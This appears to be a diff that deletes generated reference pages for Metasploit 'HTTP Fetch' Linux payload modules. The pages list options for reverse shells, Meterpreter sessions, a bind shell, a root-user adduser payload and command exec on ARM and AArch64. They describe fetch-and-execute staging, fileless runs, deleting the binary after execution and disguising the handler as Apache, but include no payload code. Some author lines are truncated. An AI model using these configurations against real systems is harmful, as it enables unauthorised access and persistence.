EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,93 +0,0 @@
Name: HTTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager
Module: payload/cmd/linux/http/aarch64/shell/reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 114
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL /bin/sh yes The shell to execute.
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME CbrLJLwKRPdb no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an AARCH64 payload from an HTTP server.
dup2 socket in x12, then execve.
Connect back to the attacker
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableStageEncoding false no Encode the second stage payload
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,81 +0,0 @@
Name: HTTP Fetch, Linux Command Shell, Reverse TCP Inline
Module: payload/cmd/linux/http/aarch64/shell_reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL /bin/sh yes The shell to execute.
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME shDguViqh no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an AARCH64 payload from an HTTP server.
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,104 +0,0 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/armbe/meterpreter_reverse_http
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 102
Rank: Normal
Provided by:
Evasion options for payload/cmd/linux/http/armbe/meterpreter_reverse_http:
=========================
cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME StuziyPw no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMBE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,106 +0,0 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/armbe/meterpreter_reverse_https
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 114
Rank: Normal
Provided by:
Evasion options for payload/cmd/linux/http/armbe/meterpreter_reverse_https:
=========================
ok@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME XhqxIbdAADBV no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMBE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
HttpServerName Apache no The server header that the handler will send in response to requests
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,97 +0,0 @@
Name: HTTP Fetch
Module: payload/cmd/linux/http/armbe/meterpreter_reverse_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Adam Cammack <adam_cammack@rapid7.com>
Brent Cook <brent_cook@rapid7.com>
timwr
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME aubpeJLQm no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMBE payload from an HTTP server.
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
MeterpreterTryToFork false no Fork a new process if the functionality is available
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,72 +0,0 @@
Name: HTTP Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline
Module: payload/cmd/linux/http/armbe/shell_bind_tcp
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 0
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /bin/sh yes The command to execute.
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LPORT 4444 yes The listen port
RHOST no The target address
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME ftrEeBVpS no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMBE payload from an HTTP server.
Listen for a connection and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,70 +0,0 @@
Name: HTTP Fetch, Linux Add User
Module: payload/cmd/linux/http/armle/adduser
Platform: Linux
Arch: cmd
Needs Admin: Yes
Total size: 108
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Jonathan Salwan
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
PASS metasploit yes The password for this user
SHELL /bin/sh no The shell for this user
USER metasploit yes The username to create
When FETCH_COMMAND is one of CURL,WGET:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
When FETCH_FILELESS is none:
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_FILENAME CXQGzVAHjB no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
Description:
Fetch and execute an ARMLE payload from an HTTP server.
Create a new user with UID 0
Name Current Setting Required Description
---- --------------- -------- -----------
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
FetchHandlerDisable false yes Disable fetch handler
FetchHttpServerName Apache yes Fetch HTTP server name
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
@@ -1,68 +0,0 @@
Name: HTTP Fetch, Linux Execute Command
Module: payload/cmd/linux/http/armle/exec
Platform: Linux
Arch: cmd
Needs Admin: No
Total size: 114
Rank: Normal
Provided by:
Brendan Watters
Spencer McIntyre
Jonathan Salwan
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CMD yes The command string to execute
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
FETCH_SRVHOST yes Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
When FETCH_COMMAND is one of CURL,WGET:
